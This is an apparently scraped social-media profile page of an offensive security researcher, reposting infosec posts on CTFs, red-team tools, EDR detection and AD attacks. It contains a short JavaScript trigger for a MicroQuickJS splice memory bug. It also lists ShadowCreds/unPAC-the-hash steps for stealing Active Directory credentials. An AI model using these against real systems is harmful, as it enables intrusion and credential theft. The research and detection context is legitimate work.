Olivia
Online
sinusoid
@the_bit_diddler
Offensive research dude. Occasional CTF player (looking for a team!)
Joined July 2016
1.7K Following
1.7K Followers
2.9K Posts
In macOS Tahoe 26.4 Apple added a new security feature to Terminal that warns users of potentially malicious pastes with a "Possible malware, Paste blocked" prompt. Here how it actually works 🧵
@vxunderground With this, bullet-point two leans heavily into bullet-point one.
The (assumed) benefit here being a shipped runtime/FFI that differs with typical PIC/loader behavior.
Coming from the "red teaming" space, it tends to check more boxes for less respective effort.
@vxunderground Changeling.
@maple3142 @RBTree_ This point resonates with my internal thoughts at the moment.
The underpinnings of CTFs were (are?) the excitement of discovery. Throwing in things like a shorter timeline (one day vs. two, etc.), and it's not surprising the path of least resistance is taken.
New blog: Using LLMs the right way for malware analysis
💡Tips for building an autonomous AI analysis lab on a 12 yo laptop and getting stuff done faster without loss of accuracy.
https://t.co/hSd3xwBKGv
@gf_256 @angelroom0 It's always a damned bummer.
Generally speaking, you all have better aggregated resources akin to https://t.co/QIzQfLpG1l I'd be very interested.
DEMOSCENE > all.
Realtime code, handmade ascii animations and raw tracker music. The demo ’CMOS Cosmos’ by Razor 1911 in 2025 #demoscene #ascii #msdos
Realtime code, handmade ascii animations and raw tracker music. The demo ’CMOS Cosmos’ by Razor 1911 in 2025 #demoscene #ascii #msdos
@b1ack0wl Been following for some time, about when he was writing a ROP-gadget finder for ARM.
Was just reading the blog on this and FORCEDENTRY, which still hails as the most insane logic implementation I can recall.
@Defte_ Update:
Thanks to @RedTeamPT, I created a pull request for ntlmrelayx to reflect the new requirements:
https://t.co/g42CHDxQdB
Now Shadow Creds are working again 😀
@bellafusari1 @DistrictCon I don't know how I saw this a year late, but turning a vape into a Glade PlugIn would've been hilarious.
Two new roles for @badsectorlabs ludus:
ludus_splunk: https://t.co/EX6tAxD9iA
ludus_splunk_universalforwarder: https://t.co/U4A0oHBV11
I've tried something new! I have streamed some unfiltered coding, writing a module to detect malicious bytes in a shellcode injection scenario for an EDR that would use the System Call Integrity Layer project: https://t.co/BF2JHEtLPx
If this content is useful, or you like it, please let me know and give me some ideas what you would want to see! I want to grow in myself and help produce content that would be beneficial for our amazing cyber community!
#blueteam #cybersecurity #redteam #driver #rust #rustlang #infosec #rustdriver #soc #cyber #cti #informationsecurity #infosec
When MicroQuickJS released, I spent 8.5 hours to summon an Exploit for it. Here is the Fault:
var arr = new Array(30)
var attack = {
valueOf: function() {
arr.length = 0
arr.length = 3
return 10
}
}
arr.splice(attack, 30)
I document the full Ritual Process below
i made a browser extension
Let's play peekaboo with PatchGuard! Read our blog post about hiding processes on modern Windows systems with HVCI enabled:
https://t.co/8q7cAo6pSo
🔥Introducing a new Red Team tool - SessionHop: https://t.co/oU2R60ayPD
SessionHop utilizes the IHxHelpPaneServer COM object to hijack specified user sessions. This session hijacking technique is an alternative to remote process injection or dumping LSASS. Kudos to @tiraniddo for first discovering this years ago.
Blue Team tip: Look for unusual child processes spawning from HelpPane.exe
Reusing part of the ESC1-unPAC BOF code to create a ShadowCreds + unPAC BOF
1. Write msDS-KeyCredentialLink attribute using obfuscated LDAP queries.
2. Authenticate to the KDC using PKINIT.
3. unPAC-the-hash.
4. Cleanup msDS-KeyCredentialLink.
https://t.co/4h4uWgcH4d
Last Seen Users on Sotwe
caramel macchiato
Seen from Indonesia
DiveAloha
Seen from Turkey
putri narapuspita🔥squirting pro 💦
Seen from Indonesia
Mara/Prestinez dietro di me 🐻🐴🐕 
Seen from Italy
كُـُـِـِِـِـِِـِـْـْْـْفُ عـُـُُـُـفـڒٍيـٌـٌٌـْت𓀤
Seen from Germany
darilana
Seen from Indonesia
兔兔
Thủy Thu
Seen from Vietnam
ทุเรียนก้านยาว K🍆56
LUKA•MAGIC
Seen from Korea
Trends for you
Most Popular Users
Elon Musk
@elonmusk
240.1M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
108.8M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.2M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.5M followers
KATY PERRY
@katyperry
86.7M followers
Taylor Swift
@taylorswift13
80.6M followers
Lady Gaga
@ladygaga
72.1M followers
Kim Kardashian
@kimkardashian
69.4M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.5M followers
Bill Gates
@billgates
63.4M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61M followers
X
@x
60.9M followers
CNN Breaking News
@cnnbrk
59.9M followers